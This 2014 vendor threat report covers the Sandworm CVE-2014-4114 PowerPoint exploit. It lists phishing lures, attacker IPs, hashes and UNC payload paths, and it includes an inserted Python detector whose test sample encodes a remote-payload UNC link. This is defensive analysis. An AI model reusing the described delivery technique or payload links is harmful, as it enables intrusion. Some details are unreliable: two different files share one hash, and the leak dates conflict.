Malware Report | October 2014 Verint Discovers Smart Variant of Zero-Day Sandworm CVE-2014-4114


Page 1: Verint Discovers Smart Variant of Zero-Day Sandwormcyber.verint.com/wp-content/uploads/2016/05/Malware_Zero... · 2019-07-27 · The attacker placed the malware payload at a remote


Verint Discovers Smart Variant of Zero-Day Sandworm CVE-2014-4114

Severity: Extremely dangerous

Verint. Powering Actionable Intelligence®

TABLE OF CONTENTS

Verint Discovers Smart Variant of Zero-Day Sandworm CVE-2014-4114
Timeline
Background
Lstudio Joins the Party
Taiwan—the Frontline for APT Cyberwar
Appendix: CVE-2014-4114 APT emails Hitting Taiwan

Unauthorized use, duplication, or modification of this document in whole or in part without the written consent of Verint Systems Inc. is strictly prohibited. By providing this document, Verint Systems Inc. is not making any representations regarding the correctness or completeness of its contents and reserves the right to alter this document at any time without notice. Features listed in this document are subject to change. Please contact Verint for current product features and specifications. All marks referenced herein with the ® or TM symbol are registered trademarks or trademarks of Verint Systems Inc. or its subsidiaries. All rights reserved. All other marks are trademarks of their respective owners. © 2014 Verint Systems Inc. All rights reserved worldwide.


VERINT DISCOVERS SMART VARIANT OF ZERO-DAY SANDWORM CVE-2014-4114

Severity: Extremely dangerous

The Verint® Research team has discovered new, sophisticated variants of the CVE-2014-4114 Russian cyber-espionage campaign targeting NATO, the European Union, and the telecommunications and energy sectors (see http://www.isightpartners.com/2014/10/cve-2014-4114/). The malware, called Sandworm, was originally discovered by iSIGHT Partners and exploited a zero-day vulnerability that Microsoft later addressed in security advisory MS14-060, published on October 14th (https://technet.microsoft.com/en-us/library/security/ms14-060.aspx).

In less than a week, starting on October 17th, the Verint research team discovered several more cases of targeted attacks using the CVE-2014-4114 exploit. The attack is delivered via emails with infected PowerPoint attachments (e.g. .pptx or .ppsx files). Until now, the payload was thought to be hosted at a remote site and fetched via SMB. However, on October 18th, the Verint team discovered an enhanced version of the malware with the payload embedded directly in the PowerPoint attachment.

The exploit leverages a feature of the Microsoft PowerPoint file format rather than a memory-corruption vulnerability, making it difficult to detect. In other words, the adversary has no need to write complicated shellcode or ROP (return-oriented programming) chains. The malware is very stable and can be triggered on Office versions after 2007. It can be relied upon to bypass most security controls, and it is powerful enough to run any program.

Once the malware is downloaded, it begins communicating over HTTP or immediately starts exfiltrating basic metadata about the compromised machine, such as the computer name and MAC address, so that the adversary can follow up with more sophisticated stage-two malware. The Verint team has identified the malware communicating with IP addresses in Hong Kong, South Korea, Argentina and the USA.

At the date of publication the new variant is still evading antivirus products worldwide, with no detections reported on VirusTotal.com. Verint Threat Protection System identifies both variants (embedded and remote) of the CVE-2014-4114 exploit.

Timeline:

2013-06  Exploit may have first been discovered and put into use by APT adversaries
2014-09  Security vendor iSIGHT found samples of the attack and alerted Microsoft
2014-10-14  Microsoft released the security advisory and PowerPoint software patch; iSIGHT Partners released a whitepaper on the exploit
2014-10-15  Crimeware/exploit packs started to leverage this exploit and send spam emails
2014-10-16  APT samples hitting Taiwan using a remote malware payload
2014-10-18  Verint discovers APT using an embedded malware payload
2014-10-23  Verint publishes this malware finding

Background

According to iSIGHT Partners, the exploit, called Sandworm, was first seen in September this year. Microsoft released a security advisory as well as a patch for all its supported software on October 14th. Since that date, attackers have been exploiting unpatched systems. Below is a snapshot of the earliest CVE-2014-4114 sample, a file named spiski_deputatov_done.ppsx with MD5 hash 330E8D23AB82E8A0CA6D166755408EB1.

The attacker placed the malware payload at a remote site, 94.185.85.122, and used a UNC path (SMB/WebDAV, which lets files be shared seamlessly between folders over HTTP) to deliver the malware file. Although its file extension is .gif, it is actually a binary executable. This technique is widely used to spread banking trojans and crimeware, but it is less common in APT attacks because the compromised machine must reach a remote server in order to complete the attack; this makes the attack less reliable and increases the risk of the adversary's C2 IP being tracked.

An example of an email infected with CVE-2014-4114 and identified by Verint static file analysis is shown below. It claims to be from Hong Kong protestors and calls on people to join the protest.

Below is a snapshot of the section of code that exploits the CVE-2014-4114 vulnerability.

Email with embedded malware

On October 18th, the Verint research team discovered another CVE-2014-4114 attack that uses an embedded malware payload rather than collecting the malware from a remote site. This email is the world's first improved version of CVE-2014-4114 that uses an embedded malware payload rather than a UNC remote download.

The malware points to a remote site 110.80.25.212 with a UNC path.


Email with embedded malware

CVE-2014-4114 with APT Malware Embedded

The attachment name is “從地方開始,贏回台灣.ppsx” (MD5 hash 7C8A14E6B070ED77845608734E2C90A4), a title meant to encourage votes for the right-wing political party.

Lstudio Joins the Party

Immediately following the discovery of this email, Verint uncovered a similar attack launched by the Lstudio group.

Infected email from Lstudio

The file is named “專家提醒各器官如何防癌.ppsx” with MD5 hash 7c8a14e6b070ed77845608734e2c90a4. This email claims to be from cancer experts advising on cancer prevention.

The screenshot below indicates that this attack also embeds malware (a binary executable file disguised as a PNG) inside the PowerPoint slides.

Verint Behavioural Analysis discovers communications

Verint automatic behavioral analysis report of the advanced attack is shown below:


Interestingly, a year ago (June 2013), reference code for a CVE-2014-4114 implementation was available at http://pastebin.com/raw.php?i=2szJtZhG and has since been removed. In other words, this exploit might have been used against highly targeted victims 18 months before Microsoft released the security advisory and patch.

Taiwan—the Frontline for APT Cyberwar

The advanced adversary improved their weapons in only two days. The new variants of CVE-2014-4114 now contain a CompObj stream in the OLE object (for details of the feature, refer to Microsoft MSDN: https://social.msdn.microsoft.com/Forums/en-US/c2044da9-a7a6-40ba-ae45-4ffd07d4178b/olenativestream-structure-doesnt-match-the-documentation and http://msdn.microsoft.com/en-us/library/dd942447(v=PROT.10).aspx). This additional CompObj stream makes the OLE Native object be treated as a package of (exe, inf) files, which can then be triggered and installed locally. The Verint team was not surprised to find that the embedded malware is the common Taidoor malware, a well-known adversary that has been actively targeting Taiwan since 2003.
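An added triage script, written for this report and not part of Verint's tooling, that checks a PowerPoint OOXML document for the two delivery styles described above and in the Background section: a slide relationship whose external target is a UNC share (remote variant), and an embedded OLE blob carrying a PE executable together with a CompObj stream (embedded variant). The relationship layout, the regexes, the stream-name check and the constructed sample document are assumptions made for the demonstration; this is a byte-level heuristic, not a full OLE compound-file parser.

```python
import io
import re
import zipfile

# Matches a UNC path such as \\203.0.113.10\public\slide1.gif
UNC_RE = re.compile(r'\\\\[0-9A-Za-z.\-]+\\[^"\'<>\s]+')
REL_RE = re.compile(r'<Relationship\b[^>]*>', re.I)
ATTR_RE = re.compile(r'(\w+)="([^"]*)"')

def scan_pptx(data: bytes) -> list:
    """Return (zip entry, indicator, detail) tuples for suspicious content."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            blob = zf.read(name)
            if name.endswith(".rels"):
                # Remote variant: an OLE relationship whose external target is a UNC share.
                for rel in REL_RE.findall(blob.decode("utf-8", errors="replace")):
                    attrs = dict(ATTR_RE.findall(rel))
                    target = attrs.get("Target", "")
                    if attrs.get("TargetMode", "").lower() == "external" and UNC_RE.search(target):
                        findings.append((name, "external-unc-target", target))
            elif name.startswith("ppt/embeddings/"):
                # Embedded variant: an executable wrapped in an OLE package keeps its
                # MZ/PE headers no matter what extension (.gif, .png) it was given.
                if b"MZ" in blob and b"PE\x00\x00" in blob:
                    findings.append((name, "embedded-pe", "MZ and PE headers in OLE blob"))
                # Compound-file stream names are UTF-16LE; a CompObj stream is the marker
                # the report associates with the locally installable (exe, inf) package.
                if "CompObj".encode("utf-16-le") in blob:
                    findings.append((name, "compobj-stream", "CompObj stream name present"))
    return findings

def build_sample(remote: bool, embedded: bool) -> bytes:
    """Constructed test document (not a real sample) exercising either variant."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        rels = "<Relationships>"
        if remote:  # 203.0.113.10 is a documentation address, not a real C2
            rels += ('<Relationship Id="rId4" Type="oleObject" '
                     'Target="file:///\\\\203.0.113.10\\public\\slide1.gif" TargetMode="External"/>')
        zf.writestr("ppt/slides/_rels/slide1.xml.rels", rels + "</Relationships>")
        if embedded:
            fake_exe = b"MZ" + b"\x00" * 62 + b"PE\x00\x00" + b"\x00" * 32
            ole_blob = b"\xd0\xcf\x11\xe0" + "CompObj".encode("utf-16-le") + fake_exe
            zf.writestr("ppt/embeddings/oleObject1.bin", ole_blob)
    return buf.getvalue()

if __name__ == "__main__":
    for flags in ((True, False), (False, True)):
        print(flags, scan_pptx(build_sample(*flags)))
```

Run it against a real .ppsx by passing the file bytes to scan_pptx; a hit on either indicator is grounds to quarantine the attachment and inspect the OLE blob with a proper compound-file parser.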

Verint has discovered multiple instances of CVE-2014-4114 infected emails in the last weeks.

Note about the vulnerability in Pastebin.com in September 2013

At the date of publication the new variant was still evading antivirus products worldwide, with no instances of its existence on VirusTotal.com.

Verint recently discovered numerous CVE-2014-4114 infected emails at multiple government organizations using Verint Advanced Threat Protection.

APPENDIX: CVE-2014-4114 APT EMAILS HITTING TAIWAN

The malware points to a remote site 110.80.25.212 with a UNC path.


About Verint Systems Inc.

Verint® (Nasdaq: VRNT) is a global leader in Actionable Intelligence® solutions with a focus on customer engagement optimization, security intelligence, and fraud, risk and compliance. Today, more than 10,000 organizations in 180 countries — including over 80 percent of the Fortune 100 — count on intelligence from Verint solutions to make more informed, effective and timely decisions.

www.verint.com/cyber | Info.cyber@verint.com